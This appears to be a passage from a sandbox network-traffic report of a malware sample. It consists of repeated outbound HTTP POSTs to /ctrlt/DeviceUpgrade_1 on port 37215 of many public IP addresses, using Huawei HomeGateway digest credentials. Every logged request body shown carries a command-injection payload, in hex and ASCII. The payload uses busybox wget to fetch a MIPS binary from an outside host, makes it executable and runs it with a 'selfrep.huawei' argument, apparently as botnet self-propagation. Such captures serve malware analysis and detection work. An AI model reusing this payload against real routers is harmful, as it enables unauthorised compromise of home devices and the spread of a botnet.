6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2345192.168.2.1350168157.249.161.2737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.784836054 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2346192.168.2.1353184157.4.137.10437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.784893990 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2347192.168.2.1336832197.182.177.5237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.785428047 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2348192.168.2.1342794197.251.235.19637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.785442114 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2349192.168.2.134934441.94.115.6537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.785464048 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2350192.168.2.1343966176.187.149.5637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.785486937 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2351192.168.2.1346800150.225.52.937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.785506964 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2352192.168.2.1338792197.197.28.21937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.785547972 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2353192.168.2.1354226197.70.228.15337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.785566092 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2354192.168.2.134168843.145.52.10037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.785582066 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2355192.168.2.134273841.44.210.14537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.785689116 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
